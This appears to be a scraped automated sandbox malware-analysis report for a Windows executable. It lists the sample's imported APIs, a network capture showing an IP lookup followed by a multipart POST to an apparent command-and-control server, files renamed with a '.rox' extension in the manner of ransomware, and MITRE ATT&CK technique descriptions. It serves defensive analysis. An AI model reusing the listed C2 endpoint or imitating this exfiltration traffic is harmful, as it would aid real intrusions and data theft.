KERNEL32.dll	FindClose, WriteFile, CloseHandle, MoveFileW, GetCurrentProcess, GetSystemInfo, GetWindowsDirectoryA, GetPhysicallyInstalledSystemMemory, GetModuleFileNameW, GetVolumeNameForVolumeMountPointA, Sleep, OpenProcess, GetWindowsDirectoryW, K32GetModuleFileNameExW, FindFirstVolumeW, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, SetVolumeMountPointW, GetFileSizeEx, ReadFile, CreateFileW, SetFileAttributesW, SetFilePointerEx, TerminateProcess, HeapAlloc, HeapFree, GetProcessHeap, GetModuleHandleA, GetNativeSystemInfo, GetCurrentThread, LoadLibraryW, lstrcpyW, lstrcatW, GetUserDefaultLangID, FindFirstFileExW, FindNextFileW, GetFileAttributesW, lstrcmpW, WaitForSingleObject, CreateEventW, LocalFree, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetConsoleOutputCP, SetEndOfFile, FlushFileBuffers, HeapReAlloc, SetStdHandle, ReadConsoleW, GetConsoleMode, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, FlsFree, FlsSetValue, GetLocaleInfoA, GetLogicalDrives, GetTickCount, QueryPerformanceCounter, GetCurrentProcessId, GetLastError, GetCurrentThreadId, GetCommandLineW, GetTimeZoneInformation, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, RtlUnwind, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetComputerNameA, SetEvent, GetDiskFreeSpaceExA, HeapSize, WriteConsoleW, GetProcAddress, FlsGetValue, FlsAlloc, GetStdHandle, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WaitForSingleObjectEx, GetExitCodeThread, InitializeCriticalSectionEx, EncodePointer, DecodePointer, GetLocaleInfoEx, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, CompareStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileType
IPHLPAPI.DLL	GetAdaptersInfo
WINHTTP.dll	WinHttpQueryDataAvailable, WinHttpReadData, WinHttpConnect, WinHttpCloseHandle, WinHttpOpen, WinHttpCrackUrl, WinHttpOpenRequest, WinHttpSetOption, WinHttpAddRequestHeaders, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpQueryHeaders, WinHttpSetTimeouts
SHELL32.dll	ShellExecuteW, CommandLineToArgvW
ADVAPI32.dll	OpenServiceW, SetNamedSecurityInfoW, SetEntriesInAclW, FreeSid, AllocateAndInitializeSid, LookupPrivilegeValueW, AdjustTokenPrivileges, OpenThreadToken, QueryServiceStatusEx, OpenSCManagerW, EnumDependentServicesW, ControlService, CloseServiceHandle, GetUserNameA, GetTokenInformation, OpenProcessToken, RegCloseKey, RegQueryValueExA, RegOpenKeyExA, CryptAcquireContextW, CryptGenRandom, CryptReleaseContext
RstrtMgr.DLL	RmRegisterResources, RmEndSession, RmStartSession, RmGetList

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 15:21:12.843660116 CET	49730	80	192.168.2.4	104.26.13.205
Nov 4, 2024 15:21:12.848742962 CET	80	49730	104.26.13.205	192.168.2.4
Nov 4, 2024 15:21:12.848813057 CET	49730	80	192.168.2.4	104.26.13.205
Nov 4, 2024 15:21:12.849363089 CET	49730	80	192.168.2.4	104.26.13.205
Nov 4, 2024 15:21:12.855397940 CET	80	49730	104.26.13.205	192.168.2.4
Nov 4, 2024 15:21:13.498368025 CET	80	49730	104.26.13.205	192.168.2.4
Nov 4, 2024 15:21:13.554559946 CET	49730	80	192.168.2.4	104.26.13.205
Nov 4, 2024 15:21:14.308341980 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:21:14.313520908 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:21:14.313616037 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:21:14.325321913 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:21:14.325321913 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:21:14.330265999 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:21:14.330364943 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:21:14.330374956 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:21:15.474797964 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:21:15.533473969 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:15.670192957 CET	49730	80	192.168.2.4	104.26.13.205
Nov 4, 2024 15:22:15.670315027 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:15.675376892 CET	80	49730	104.26.13.205	192.168.2.4
Nov 4, 2024 15:22:15.675467014 CET	49730	80	192.168.2.4	104.26.13.205
Nov 4, 2024 15:22:15.675823927 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:22:15.675883055 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:57.998275995 CET	49994	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:58.003916979 CET	80	49994	193.143.1.139	192.168.2.4
Nov 4, 2024 15:22:58.004131079 CET	49994	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:58.004302025 CET	49994	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:58.004370928 CET	49994	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:58.009309053 CET	80	49994	193.143.1.139	192.168.2.4
Nov 4, 2024 15:22:58.009320974 CET	80	49994	193.143.1.139	192.168.2.4
Nov 4, 2024 15:22:58.009330034 CET	80	49994	193.143.1.139	192.168.2.4
Nov 4, 2024 15:22:59.153732061 CET	80	49994	193.143.1.139	192.168.2.4
Nov 4, 2024 15:22:59.347520113 CET	49994	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:22:59.642051935 CET	49994	80	192.168.2.4	193.143.1.139

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 15:21:12.778743029 CET	62976	53	192.168.2.4	1.1.1.1
Nov 4, 2024 15:21:12.786091089 CET	53	62976	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 15:21:12.849363089 CET	200	OUT	GET / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Host: api.ipify.org
Nov 4, 2024 15:21:13.498368025 CET	434	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 14:21:13 GMT Content-Type: text/plain Content-Length: 14 Connection: keep-alive Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8dd53fcebf8a28d5-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=200&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 Data Ascii: 173.254.250.69

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 15:21:14.325321913 CET	337	OUT	POST /Ujdu8jjooue/biweax.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=------------------------PARZD3yTW Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Content-Length: 1892 Host: 193.143.1.139
Nov 4, 2024 15:21:14.325321913 CET	1892	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 50 41 52 5a 44 33 79 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 76 65 72 73 69 6f 6e Data Ascii: --------------------------PARZD3yTWContent-Disposition: form-data; name="version"1.0--------------------------PARZD3yTWContent-Disposition: form-data; name="https_protocol"NO--------------------------PARZD3yTWContent-Disposit
Nov 4, 2024 15:21:15.474797964 CET	244	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 04 Nov 2024 14:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.1.2-1ubuntu2.19 Vary: Accept-Encoding Data Raw: 34 0d 0a 47 6f 6f 64 0d 0a 30 0d 0a 0d 0a Data Ascii: 4Good0

Target ID:	0
Start time:	09:21:10
Start date:	04/11/2024
Path:	C:\Users\user\Desktop\2b7cu0KwZl.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\2b7cu0KwZl.exe"
Imagebase:	0x7ff688270000
File size:	726'016 bytes
MD5 hash:	0D7E80EC85DB5CB45642235CB2381A0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2b7cu0KwZl.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Documents and Settings\All Users\.curlrc.rox (copy)

C:\Documents and Settings\All Users\Desktop\Adobe Acrobat.lnk.rox (copy)

C:\Documents and Settings\All Users\Desktop\Firefox.lnk.rox (copy)

C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk.rox (copy)

C:\Documents and Settings\All Users\Microsoft OneDrive\setup\refcount.ini.rox (copy)

C:\Documents and Settings\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1.rox (copy)

C:\Documents and Settings\All Users\Microsoft\ClickToRun\DeploymentConfig.1.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd.rox (copy)

C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.bmp.rox (copy)

C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.png.rox (copy)

Windows Analysis Report
2b7cu0KwZl.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre